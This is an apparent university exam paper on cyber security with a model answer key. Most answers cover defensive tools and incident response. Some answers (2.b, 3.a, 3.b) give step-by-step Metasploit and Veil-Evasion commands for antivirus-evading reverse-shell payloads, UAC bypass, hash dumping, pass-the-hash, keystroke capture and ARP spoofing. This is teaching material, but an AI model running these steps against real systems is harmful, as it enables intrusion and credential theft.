CS/IT423
Hall Ticket Number:
IV/IV B.Tech (Regular) DEGREE EXAMINATION
MARCH, 2017
Eighth Semester
Computer Science & Engineering
Cyber Security-II
Time: Three Hours
Maximum : 60 Marks
Answer Question No.1 compulsorily.
(1X12 = 12 Marks)
Answer ONE question from each unit.
(4X12=48 Marks)
1. Answer all questions
(1X12=12 Marks)
a
What is metasploit Frame work?
b
Purpose of Information Gathering.
c
Types of password attacks?
d
Need for firewall?
e
Differentiate Virus & Worms?
f
Define Email-Spam?
g
Give some Examples of incidents?
h
What is the Command used for displaying current running processes in UNIX-based systems?
i
What is the use of FTK imager?
j
List out Types of Location based Data Backups?
k
What is 3-2-1 rule?
l
Define Log management?
2.a
2.b
UNIT – I
How to scan live hosts, active ports, types of Operating Systems with Zen map.
6M
What is Veil-evasion? Explain the procedure for how to bypass windows Anti-virus 6M
with veil- evasion?
(OR)
3.a
Discuss the Procedure for how to hack the target system by using pass the hash 8M
method. Write the purpose for key scan?
3.b
Write short notes on Online password attacks with some examples.
4M
UNIT – II
4.a
State the purpose of snort tool? Explain Installation procedure for snort and parts of 8M
rule? Write the rule for alerting incoming ping requests from any source to any
destination IP Addresses and Ports?
4.b
Differentiate ClamAv and Clamtk and write the commands for identifying & 4M
removing virus files by using ClamAv?
(OR)
What is web application security? Explain Different types of web application attacks. 8M
Write the procedure for detecting SQL injection attack by using mod-security tool?
4M
5.b
Explain the installation & Configuration procedure for mail scanner?
5.a
UNIT – III
6.a
6.b
Discuss IR Methodologies based on Procedures.
How to investigate the Unix based systems based on the Artifacts.
6M
6M
(OR)
7.a
Why we need FTK imager? Explain the procedure for how to create the disk image 6M
and recovering the permanent deleted files/images by using FTK imager.
6M
7.b
What is incident and incident Response? Explain the needs and goals of IR
UNIT – IV
8.a
8.b
What are the different types of storage devices? Give advantages and disadvantages?
What is the need of rsync tool? Explain the options of rsync tool. Write the
commands for copying files to local systems and remote systems.
(OR)
9.a
What is Log.? Explain the uses of Logs and types of Logs? How to install and
configure Log watch Tool in to system?
9.b
Explain about Log management Infrastructure Tiers and functionalities of Log
management Infrastructure.
6M
6M
6M
6M
1.Answer the following
a. what is metasploit frame work?
Metasploit is a frame and platform for vulnerability testing and exploitation.
b. Purpose of information gathering?
Information gathering is defined as gathering the details of system like ports, services,
subdomains, domains and live systems. These details are used to hack the system.
c. Types of password attacks?
Passive online attacks
Active online attacks
Offline attack
Nontechnical attacks
d. need for fire wall?
Firewall act as security for the system. When system is connected to network there is a
chance for hackers to hack system. So fire wall prevent them by acting as security.
e. differntiate virus and worms?
Virus
Virus does not have self-replicating capability
Worms
Worms have self-replicating capability
f. Define email-spam?
Email-spam is defined as electronic version of junk mail.
g. Give some examples of incidents?
User infected by downloading and running a malicious email attachment.
A gateway router forwarding all network traffic to an attacker.
A web server is crashed due to vast amount of incoming connections from compromised
clients.
h. what is command used for displaying current running process in unix-based system.
Ps-elf is the command
i. what is the use of FTK imager?
Used for copying bit by bit data of the driver
Used to retrieve deleted files
Used for analysing the files in case of any modification based on the encrypted value.
j. list out types of location data backups?
Local
Remote
Online
Offsite
Cloud
ftp
k. what is 3-2-1 rule?
3- one primary and two backups
2- two types of media (hard drive and optical media)
1- one offsite storage
l. Define log management?
Log management is defined as collecting, aggregating and analysing the network data for a
variety of purposes.
Unit 1
2.a. How to scan live hosts, active ports, types of operating system with zenmap.
Topology tab
The “Topology” tab is an interactive view of the connections between hosts in a
network. Hosts are arranged in concentric rings. Each ring represents an additional
network hop from the center node. Clicking on a node brings it to the center. Because
it shows a representation of the network paths between hosts, the “Topology” tab
benefits from the use of the --traceroute option.
Port/hosts tab
The “Ports / Hosts” tab's display differs depending on whether a host or a service is
currently selected. When a host is selected, it shows all the interesting ports on that
host, along with version information when available
Nmap output tab
The “Nmap Output” tab is displayed by default when a scan is run. It shows the familiar
Nmap terminal output. The display highlights parts of the output according to their meaning
The “Host Details” tab
Each host has an icon that provides a very rough “vulnerability” estimate, which is based
solely on the number of open ports. The icons and the numbers of open ports they correspond
to are
0–2 open ports,
3–4 open ports,
5–6 open ports,
7–8 open ports, and
9 or more open ports.
OS icons
FreeBSD
Irix
Linux
Mac OS
OpenBSD
Red Hat Linux
Solaris or OpenSolaris
Ubuntu Linux
Windows
Other (no specific icon)
OS detection not performed
Scan Results Tabs
Each scan window contains five tabs which each display different aspects of the scan
results. They are: “Nmap Output”, “Ports / Hosts”, “Topology”, “Host Details”, and “Scans”.
Scan specification
Zenmap is packaged with default profiles
Intense scan
command = nmap -T4 -A -v
An intense, comprehensive scan. The -A option enables OS detection (-O), version
detection (-sV), script scanning (-sC), and traceroute (--traceroute). Without root
privileges only version detection and script scanning are run. This is considered an
intrusive scan.
Intense scan plus UDP
command = nmap -sS -sU -T4 -A -v
Does OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute
(--traceroute) in addition to scanning TCP and UDP ports.
Intense scan, all TCP ports
command = nmap -p 1-65535 -T4 -A -v
Scans all TCP ports, then does OS detection (-O), version detection (-sV), script
scanning (-sC), and traceroute (--traceroute).
Intense scan, no ping
command = nmap -T4 -A -v -Pn
Does an intense scan without checking to see if targets are up first. This can be useful
when a target seems to ignore the usual host discovery probes.
Ping scan
command = nmap -sn
This scan only finds which targets are up and does not port scan them.
Quick scan
command = nmap -T4 -F
This scan is faster than a normal scan because it uses the aggressive timing template
and scans fewer ports.
Quick scan plus
command = nmap -sV -T4 -O -F --version-light
A quick scan plus OS and version detection.
Slow comprehensive scan
command = nmap -sS -sU -T4 -A -v -PE -PS80,443 -PA3389 -PP -PU40125 -PY -source-port 53 --script all
This is a comprehensive, slow scan. Every TCP and UDP port is scanned. OS detection (-O),
version detection (-sV), script scanning (-sC), and traceroute (--traceroute) are all enabled.
Many probes are sent for host discovery. This is a highly intensive scan.
2.b. What is veil evasion ? explain the procedure for how to bypass windows anti virus
with vail evasion.
Veil-evasion
The antivirus and the fire walls are generally used for security purpose. But the truth is that
we can bypass the antivirus and the fire wall by using the veil a remote shell payload
generator that can bypass many current anti-virus programs. Many antivirus programs work
by pattern or signature matching. If a program looks like malware that it has been programed
to look for, it catches it. If the malicious file has a signature that AV has not seen before,
many will dutifully say that the file is clean and not a threat.
Veil , a new payload generator created by security expert and Blackhat USA class instructor
chris truncer, does just that .It takes a standard metasploit payload and through a metasploit
like program allows you to create multiple payloads that most likely will bypass anti-virus.
Veil can be installed into the system by using the following command
“install apt-get veil-evasion”
The steps that are involved in the bypassing the anti virus or the firewall using the veilevasion.
i.
ii.
iii.
install apt-get veil-evasion
Open terminal start veil-evasion
Picking the payload using ‘use’ command,
‘powershell/meterpreter/rev_tcp ‘ payload is used.
iv.
v.
vi.
vii.
Set the lhost value using ‘set lhost #ipaddress’ command.
Generate payload using ‘generate’ command.
Give name for the payload .
Go to path var/lib/veil-evasion/output/source copy the file to the
target system, click on the file.
How to bypass antivirus firewall using veil-evasion.
a) Tools required
➢ VMware Workstation Pro 12.1.1
➢ kali-linux-2016.2-amd64
➢ windows (os with any version)
b) Steps
Step1: Open terminal start veil-evasion
Step2: Picking the payload using ‘use’ command,
‘powershell/meterpreter/rev_tcp ‘ payload is used.
Step3: Set the lhost value using ‘set lhost #ipaddress’ command.
Step4: Generate payload using ‘generate’ command.
Step5: Give name for the payload .
Step6: Go to path var/lib/veil-evasion/output/source copy the file to the
target system, click on the file.
Step7: Start msfconsole to open metasploit framework.
Step8: Pick the exploit using ‘use’ command, use exploit/multi/handler
Step9: Pick payload ‘ set payload windows/meterpreter/reverse_tcp’
Step10: ‘show options’ shows the options ,set options
set lhost 192.168.219.168
Step11: Use command ‘exploit’ to start exploitation ,its shows
information about session.
Step12: Command ps shows the task manager of the hacked system.
Step13: To hide task use ‘migrate’ command. This hides the task under
another task . migrate 8588
3a. Discuss the procedure for how to hack the system by using pass the hash
method .write the purpose for key scan.
Pass the hash means bypassing the hash value with out cracking the hash value into
plain text. All this is done through msfconsole by using the metasploit command
psexec. We give the user name and password retrived through hash dump command
and ip of the target system .by doing this we can access the target system.
•
•
•
•
•
•
•
•
•
Open terminal start veil-evasion
Picking the payload using ‘use’ command,
‘powershell/meterpreter/rev_tcp ‘ payload
is used.
Set the lhost value using ‘set lhost #ipaddress’ command.
Generate payload using ‘generate’ command.
Give name for the payload .
Go to path var/lib/veil-evasion/output/source copy the file to
the
target system, click on the file.
Start msfconsole to open metasploit framework.
Pick the exploit using ‘use’ command, use
exploit/multi/handler
Pick payload ‘ set payload windows/meterpreter/reverse_tcp’
•
▪
▪
▪
▪
▪
‘show options’ shows the options ,set options
o set lhost 192.168.219.168
• Use command ‘exploit’ to start exploitation ,its shows
information about session.
• Type background , Then use the exploit “use
exploit/windows/local/bypassuac, exploit
getsystem
getuid
run post/windows/gather/hashdump
goto background and use command use exploit/windows/smb/psexec.
Set rhost , set smb user, smbpass (give hash value).
Give exploit.
Purpose of key scan
Key scan is a part of password attack . The purpose of keyscan is to get the letters or
data which the target user typed in his system. By using keyscan_ start and by using
keyscan_dump.
3.b. write short notes on online password attacks with examples.
Passive online
In passive online attacks an attacker don’t contact with authorizing party for stealing
password, in other words he attempts password hacking but without communicating
with victim or victim account. Types of passive online attacks includes wire sniffing,
Man in the middle attack and reply attack.
example
Open brower and download a windows security tool
Enter your password to encrypt in the provided textbox enter password here to hash .it will
generate a hash value for your password.
Refresh the brower and enter the hash value that you retrived it will give the plain text
password.
Active online
This type of attack can be directly termed as password guessing. An attacker tries
number of passwords one by one against victim to crack his/her password.
Examples
Man in middle of attack
Mitmf
-i etho -- target <ipaddress> --gateway <ipaddress> -- arp –hsts –spoof
Route –n.
Unit 2
4a. state the purpose of the snort tool ? explain installation procedure for snort and
parts of rules ? write the rule for altering incoming ping requests from any source to
any destination ip address and ports?
purpose
Snort is an open source network intrusion detection and prevention system
Through protocol analysis, content searching, and various pre-processors,
Snort detects thousands of worms, vulnerability exploit attempts,
port scans, and other suspicious behavior.
Sniffer mode
Packet logger mode
IDS mode
IPS mode
Installation procedure
To install snort, type the following commands in terminal:
1) sudo apt-get update
2) sudo apt-get install snort
In Snort, the rule is divided into two parts:
1) Rule header
2) Rule option/body
Rule header identifies the traffic based on the following criteria:
1) Action
2) Protocol
3) Source IP
4) Source port.
5) Operator
6) Destination IP
7) Destination port
The most common rule options include:
1) msg
2) sid
3) content
4) nocase
COMMAND for ping
alert icmp any any -> any any (msg:"ICMP Packet"; sid:477; )
4b. Differentiate between the clamav and clamtk and write the commands for
identifying & removing virus files from the system.
Clamav
Clamav is the console version all the operations are performed in console
Clamav does not provide as much features as clamtk
Clamav does not provide quarantine and update options
Clamav does not support scheduler to update the system.
Clamtk
Clamtk is the gui version of the clamav which provides rich user interface.
Clamtk provied rich operations than clamav with good user interface
Clamtk support quarantine and update option for updating
Clamtk support scheduler so that we can set the time and updation will be done
automatically.
Command for removing the virus files
Clamscan -r --remove /user/home
5.a. What is web application security ? explain different types of web application
attacks . write the procedure for detecting SQL injection attack by using mod-security
tool?
The web application security feature enables the application to act as an application firewall
and provide web application security and intrusion protection.
Sql injection
Php injection
Error messgae exploitation
Cookie exploitation
Buffer over flow
Form exploitation
Webserver finger printing
Meta character and format string attacks
Cross side scripting attacks
url redirects and directory traversal
identity theft
Procedure for sql injection attack detecting using mod security
1) Open the Terminal Window and enter :
a) cd /tmp
b) sudo wget -O SpiderLabs-owasp-modsecurity-crs.tar.gz
https://github.com/SpiderLabs/owasp-modsecurity-crs/tarball/v2.2.5
c) sudo tar -zxvf SpiderLabs-owasp-modsecurity-crs.tar.gz
d) sudo cp -R SpiderLabs-owasp-modsecurity-crs-*/* /etc/modsecurity/
e) sudo rm SpiderLabs-owasp-modsecurity-crs.tar.gz
f) sudo rm -R SpiderLabs-owasp-modsecurity-crs-*
g) sudo mv /etc/modsecurity/modsecurity_crs_10_setup.conf.example
/etc/modsecurity/modsecurity_crs_10_setup.conf
This is the default CRS config file
Now add these rules to Apache2. Open a terminal window and enter:
sudo vi /etc/apache2/mods-available/mod-security.conf
Add the following to towards the end of the file with other includes and save the file :
Include "/etc/modsecurity/activated_rules/*.conf“
Run the mod security we can detect the sql injection attack
5.b. Explain the installation & configuration procedure for mail scanner.
Goto Mail-Scanner website and goto downloads (https://www.mailscanner.info/downloads/ )
Download the ubuntu version.
Before installing the mailscanner, Install postfix mail-server.(virustotal website)
Mail-server acts as a mail transfer agent, all the incoming mails and outgoing mails are
transferred through mail-servers.
Steps to Install and configure Postfix
It is simple and straightforward.
Open the terminal and type the following commands:
1) sudo apt-get update
2) sudo apt-get install postfix
After typing those commands it will automatically install postfix.
It will pop up a screen,
For first screen contains general instructions and other data,
press ok.
Install and configure mailscanner
To install mailscanner, goto the downloaded folder and run the install.sh file
To run install.sh file in terminal:
./install.sh
Mailscanner Basic configuration-postfix
In order to configure the mailscanner follow the following steps:
In the Postfix configuration file /etc/postfix/main.cf add this line
header_checks = regexp:/etc/postfix/header_checks
In the file /etc/postfix/header_checks add this line:
/^Received:/ HOLD
How to Set up MailScanner for Use with Postfix
Open the /etc/MailScanner/mailscanner.conf file and modify the following 5 settings:
Run As User = postfix (setting to postfix)
Run As Group = postfix (setting to postfix)
Incoming Queue Dir = /var/spool/postfix/hold (changing path for incoming)
Outgoing Queue Dir = /var/spool/postfix/incoming(changing path for outgoing)
MTA = postfix (Set mait transfer agent as postfix)
You will need to ensure that the user “postfix” can write to
/var/spool/MailScanner/incoming and /var/spool/MailScanner/quarantine:
chown postfix.postfix /var/spool/MailScanner/incoming
chown postfix.postfix /var/spool/MailScanner/quarantine
Here we are changing the ownership
Now restart the mailscanner.
Command for restarting: /etc/init.d/mailscanner restart
UNIT 3
6a. Discuss IR Methodologies based on procedures.
Ans: Incident response is a coordinated and structured approach to identify and resolve an
incident.
IR Methodologies
Based on procedure Phases Of IR
• Pre-incident Preparation
• Detection and Analysis
• Containment, Eradication and Recovery
• Post Incident Activity
Pre incident prepation:
Risk identification: The first step in pre-incident preparation phase is to identify the
risks(possible threats) that are associated with organization’s business operation.
Identify critical assets: Critical assets are the assets that have major impact on business
operation.
Risk Criteria
•
•
Monetory cost
Operations impact
•
•
Public relations fallout
Impact on humans
Risk Categories
•
•
•
•
•
•
•
Break in
Unauthorised execution of programs or commands
Privilage Escalation
Exploitation of cgi
Denial of service
Web Defacement
Spoofing
Risk Propabilities
• Collect data within the organization.
• Collect data by other organizations.
• Vulnerability Analysis
Identify threats:
•
•
After identifying the critical assets, identify the possible threats on those assets.
For example, a web server with outdated software may have potential to be
attacked. A network device(router) configured with weak password may be
attacked.
Detection and analysis
•
•
•
Intrusion detection system
Snort
Detection software
Logwatch
Reporting
Containment
Strategies
•
•
•
•
•
Shutting down a system
Disconnect from the network
Change filtering rules of firewalls
Disabling or deleting compromised accounts
Increasing monitoring levels
Adhering to containment procedures.
Record all actions
Eradication
•
•
•
Eliminate the cause of the incident.
Software available for most virus, worm attacks.
Procedures are very important.
Recovery
▪Return compromised systems back to its normal mission status.
▪Recovery procedures: Safest is:
▪Record every action.
▪Keep users aware of status.
▪Advise appropriate people of major developments that might affect them.
▪Adhere to policy regarding media contact.
▪Return logging to normal level.
▪Install patches for any exploited vulnerability.
Post Incident Activity:
Follow-up includes:
▪Writing an Incident Report
▪What went right or wrong in the incident response?
▪How can process improvement occur?
▪How much did the incident cost (in loss & handling & time)
▪Present report to relevant stakeholders
6b.How to investigate the UNIX based sustems based on artifacts.
Ans:
Finding the installed software in the system
By collecting all the installed packages list we can identify the software used by the attacker
and responsible for the incident.
Command: dpkg –get-selections>> Displays the list of installed software.
Package installation details
Debian-based systems,
Command:/var/lib/dpkg/status – conatins details about installed packages.
/var/log/dpkg.lof file records information when the package is installed.
Examining the running processes in the system
Command: ps –elf
Examining the system uptime
Uptime indicates how long th system has been running since the last reboot.
Command: uptime
Command: w
Examining the system user shell history
Path: /home/<username>/.bash_history
Command:history
Listing out the open files in the system
Operating system maintain a list of open files, which typically include the user or process that
opened each file.
Command: lsof
File system listings
Command:ls –alRu
Data Collection
Currently loaded kernel modules –lsmod
Boot time messages –dmesg
User Accounts and groups –Passwords -- /etc/passwd./etc/shadow,/etc/group
Logged on users –who
Current user –whoami
Process to port correlation
It is conducted by querying a subject system with a combination of the netstat,lsof and fuser
commands.
Command: netstat –anp
Routing information using the netstat command
The native netstat –rn, route commands display the current routing table and gateways for all
the routes on the suspicious computer.
Command: netstat –rn
Examining data in ARP Cache
This command displays route entries for the suspicious computer.
Command: arp –a
Dumping RAM
The process of capturing the memory is know as dumping.Memory dumps are a valuable
source of ephemeral evidence and volatile information. Memory dumps may contains
passwords to encrypted volumes,account login credentials for many webmail,social network
services,file sharing service etc.
Linux memory is stored in /dev/mem which is unavailable to acess by the user.So, lodable
kernel modules like fmen,LiMe are used to provide direct acess to memory.
Using fmen:
Fmen is kernel module that creates device /dev/fmen , similar to /dev/mem but without
limitations.
7a.Why we need FTK imager? Explain the procedure for how to crete the disk image
and recovering the permanent deleted files by using FTK imager.
Ans: Acess Data produces a commercial forensic examation program called the Forensic
Toolkit, or FTK.
It allows the user to create images of physical disks,logical drives,and even folders.
It can also save images in multiple formats.
Procedure:
Step1:Launch FTK imager by clicking on the Acess Data FTK Imager icon.
Step2: Click file and look over various options for creating images.
Step3: Click create disk image .Select the correct drive type for the situation.
Step4: Select the desired drive in the resulting select drive window.Click finish.
Step5: The appropriate umage source has been selected.Click add to select the imahe type and
choose the image destination.
Step6: Select the desired image format.click next.
Step7: A window will be displayed to fill the information regarding the case for
organizational purpose. Fill it and click next.
Step 8: Select the folder in which the image file will be placed.
Step 9: The image fragment size field specifies the number of megabytes into which FTK
imager should split each chunck of the image file.
Step 10: The disk image will be saved to the investigating drive. Verify images after they are
created .Click start to create a image file.
Step 11: The image will be created. This may take some time depending on file size.
Step 12: Both MD5 and SHA1 hash values have been created for the image file.
Step 13: Click on image summary to view the results pertaining to the image that has just
been created .This information should verify what was entered in the creation process .It will
also verify the created hashes.
7b.What is incident and incident Response? Explain the needs and goals of IR.
Incident
An incident is a violation or imminent threat of violation of computer security policies
acceptable use policies, or standard security practices.
Incident response
Incident response is a coordinated and structured approach to identify and resolve an incident.
Need for IR
•
•
•
•
Incidents are inevitable and more complex in nature.
Whenever any incident occurs, it is very important to have an approach that
mimimizes its impact and consequences on business operations as soon as possible.
A new structured approach is required to resolve incidents quickly and
effectively.Using traditional approaches,it takes months or even years to resolve them.
The approach should make use of lessons learned from past incidents to prepare for
handling future incidents effectively.
Goal of IR
•
The main goal of incident response is to effectively remove an intrusion and threats
from the infected systems, while minimizing damages and restoring normal
operations as quickly as possible.
UNIT 4
8a.What are the different types of storage devices? Give advantages and disadvantages?
Ans: Generally, storage types are classified into the following.
1. Local storage options
2. Remote storage options
External Hard Drive
•
These are hard drives similar to the type that is installed within a desktop computer or
laptop computer.
•
The difference being that they can be plugged into the computer or removed and kept
separate from the main computer.
Advantages
•
•
Very good option for local backups of large amounts of data.
The cheapest storage option in terms of cost per GB. Very reliable when handled with
care.
Disadvantages
•
Can be very delicate. May be damaged if dropped or through electrical surge.
Solid State Drive
•
•
•
Solid State Drives look and function similar to traditional mechanical/ magnetic hard
drives but the similarities stop there.
Internally, they are completely different.
Solid State Drives have no moving parts or rotating platters which means means that
they use less power than traditional hard drives and are much faster too.
Advantages
•
•
•
Faster read and write performance.
More robust and reliable than traditional magnetic hard drives.
Highly portable. Can be easily taken off site.
Disadvantages
•
•
Relatively expensive when compared to traditional hard drives.
Storage space is typically less than that of traditional magnetic hard drives at the same
price bracket.
Network Attached Storage (NAS)
•
•
NAS are simply one or more regular IDE or SATA hard drives plugged in an array
storage enclosure and connected to a network Router or Hub through a Ethernet port.
Some of these NAS enclosures have ventilating fans to protect the hard drives from
overheating
Advantages
•
•
Very good option for local backups especially for networks and small businesses.
As several hard drives can be plugged in, NAS can hold very large amounts of data.
Disadvantages
•
•
Significantly more expensive than using single external hard drives.
Difficult to bring off site.
•
Very much a local backup; and hence, still susceptible to some events like theft and
floods, fire etc.
USB Thumb Drive or Flash Drive
•
•
USB Thumb Drives or Flash drives are similar to Solid State Drives except that these
are much smaller in size and capacity.
They have no moving parts. This makes them quite robust.
Adavntages
•
•
The most portable storage option. Can fit on a keychain making it an offsite backup
when you bring it with you.
Much more robust than traditional magnetic hard drives.
Disadvantages
•
Relatively expensive per GB so can only be used for backing up a small amount of
data.
Optical Drive(CD/DVD)
•
They do not make good storage options for backups due to their shorter lifespan,
small storage space and slower read and write speeds.
Advantages:
•
Low cost per disk.
Disadvantages
•
•
Relatively shorter lifespan than other storage options.
Not as reliable as other storage options like external hard disk and SSD. One damaged
disk in a backup set can make the whole backup unusable.
Cloud storage
•
•
Cloud storage is storage space on commercial data center accessible from any
computer with Internet access.
It is usually provided by a service provider and is a remote storage option.
Advantages
•
•
A very good offsite backup.
Not affected by events and disasters such as theft, floods, fire etc.
Disadvantages
•
•
•
Requires an Internet connection to access the cloud storage.
More expensive than traditional external hard drives.
Often requires an ongoing subscription.
8b.What is the need of rsync tool? Explain the options of rsync tool. Write the
commands for copying files to local systems and remote systems.
Rsync (Remote Sync) is a most commonly used command for copying and
synchronizing files and directories remotely as well as locally in Linux/Unix systems. With
the help of rsync command you can copy and synchronize your data remotely and locally
across directories, across disks and networks, perform data backups and mirroring between
two Linux machines.Because of the flexibility, speed it has become a standard Linux utility,
included in all popular Linux distributions.
Some advantages and features of Rsync command
1. It efficiently copies and sync files to or from a remote system.
2. Supports copying links, devices, owners, groups and permissions.
3. Rsync consumes less bandwidth as it uses compression and decompression method
while sending and receiving data both ends.
Options:
-a or –archive: a quick way of saying you want recursion and want to preserve almost all
attributes of the source files
-v or --verbose :This option increases the amount of information you are given during the
transfer (rsync works silently without it).
-z or --compress (for fast purpose don’t think data is compress) : rsync compresses the file
data as it is sent to the destination machine, which reduces the amount of data being
transmitted -- something that is useful over a slow connection.
--progress : This option tells rsync to print information showing the progress of the transfer.
This gives a bored user something to watch. It implies --verbose if it wasn't already specified.
Command
To local system
Rsync –azvf /root/rpmpkgs /tmp/backups
To remote system
Rsync –avzhe ssh backup.tar [email protected]:/backups/
9a. What is log? Explain uses of logs and types of logs? How to install and configure log
watch tool in to system?
Ans: A log is a record of the events occurring within an organization’s systems and
networks.Logs are composed of log entries; each entry contains information related to a
specific event that has occurred within a system or network.
Logs can be useful for :
a.
Performing auditing and forensic analysis
b.
Supporting the organization’s internal investigations
c.
Establishing baselines, and
d.
Identifying operational trends and long term problems
Types of Logs
1.Security software logs
Most organizations use several types of network-based and host-based security softwares to
detect malicious activity, protect systems and data, and support incident response efforts.
Accordingly, security software is a major source of computer security log data.
2.Operating System Logs
Operating systems (OS) for servers, workstations, and networking devices (e.g., routers,
switches) usually log a variety of information related to security.
3.Application Logs
Operating systems and security software provide the foundation and protection for
applications, which are used to store, access, and manipulate the data used for the
organization’s business processes.The following are some of the most commonly logged
types of information from applications:
1. Client requests and server responses
2. Account and Usage information
Install and configure Log Watch tool:
Logwatch is an application that helps with simple log management by daily analyzing and
reporting a short digest from activities taking place on your machine.
To install Logwatch on Ubuntu / Debian, run the following:
$ sudo apt-get install -y logwatch
Now that we have Logwatch installed, let’s work on running logwatch manually.
Configuring Logwatch
Although its settings can be overridden during each run manually, in general, you will want
to have Logwatch running daily, using common configuration.
The default configuration file for Logwatch is located at:
/usr/share/logwatch/default.conf/logwatch.conf
The configuration file has a long list of variables which you can modify either during the
manual run or directly in the configuration file itself.
1.The e-mail address to which daily digest (reports) are sent
MailTo = root(targetn email)
Replace root with your email address.
Example:
MailTo = [email protected]
2. The e-mail address from which these reports originate
MailFrom = Logwatch
You might wish to replace Logwatch with your own email again.
Example: MailFrom = [email protected]
3. Setting the range for the reports.
Default: Range = yesterday
You have options of receiving reports for All (all available since the beginning), Today (just
today) or Yesterday (just yesterday).(week)
Example: Range = Today
4. Setting the reports' detail
Default: Detail = Low
You can modify the reports' detail here.
Options are: Low, Medium and High.
Example: Detail = Medium
5. Setting services (applications) to be analysed
By default, Logwatch covers a really wide range of services.
If you would like to see a full list, you can query the contents of the file scripts/services
located at /usr/share/logwatch/.
Example: ls -l /usr/share/logwatch/scripts/services
9b. Explain about Log Management Infrastructure Tiers and functionalities of log
management infrastructure.
Ans: A log management infrastructure typically comprises the following three tiers:
1. Log Generation
2. Log Analysis and Storage
3. Log Monitoring
Log Generation
The first tier contains the hosts that generate the log data. Some hosts run logging client
applications or services that make their log data available through networks to log servers in
the second tier.
Log Analysis and Storage
The second tier is composed of one or more log servers that receive log data or copies of log
data from the hosts in the first tier. The data is transferred to the servers either in a real-time
or near-real-time manner, or in occasional batches based on a schedule or the amount of log
data waiting to be transferred.
Log Monitoring
The third tier contains consoles that may be used to monitor and review log data and the
results of automated analysis.
Functions of Log management Infrastructure:
The following items describe common log management infrastructure functions:
•
•
•
•
•
•
•
•
•
Log parsing
Event filtering
Log rotation
Log archival
Log reduction
Log conversion
Log file integrity
Event correlation
Log reporting
•
Disposal
Log parsing:
Log parsing is extracting data from a log so that the parsed values can be used as input for
another logging process.
Event filtering:
Event filtering is the ignoring of log entries from analysis, reporting, or long-term storage
because their characteristics indicate that they are unlikely to contain information of interest.
Event aggregation:
In event aggregation, similar entries are consolidated into a single entry containing a count of
the number of occurrences of the event.
Log rotation:
Log rotation is closing a log file and opening a new one when the previous file is considered
to be complete.
Log archival:
Log archival is retaining logs for an extended period of time, typically on removable media, a
Storage Area Network (SAN), or a specialized log archival appliance or server. Logs often
need to be preserved to meet legal or regulatory requirements.
Log compression:
Log compression is storing a log file in a way that reduces the amount of storage space
needed for the file without altering its contents. Log compression is often performed when
logs are rotated or archived.
Log reduction:
Log reduction is removing unnecessary entries from a log to create a new log that is smaller.
A similar process is event reduction, which removes unneeded data fields from all log entries.
Log file integrity checking:
Log file integrity checking involves calculating a message digest for each file and storing the
message digest securely to ensure that changes to archived logs are detected.
Event correlation:
Simply put, event correlation is finding relationships between two or more log entries. The
most common form of event correlation is rule-based correlation, which matches multiple log
entries from a single source or multiple sources based on logged values, such as timestamps,
IP addresses, and event types.
Log viewing:
Log viewing is displaying log entries in a human-readable format. Most log generators
provide some sort of log viewing capability; third-party log viewing utilities are also
available. Some log viewers provide filtering and aggregation capabilities.
Log reporting:
Log reporting is displaying the results of log analysis.This is similar to the dashboard of
websites where you can see the number of visits to the website in a specified time range.
Log clearing:
Log clearing is removing all entries from a log that precede a certain date and time. Log
clearing is often performed to remove old log data that is no longer needed on a system
because it is not of importance or it has been archived.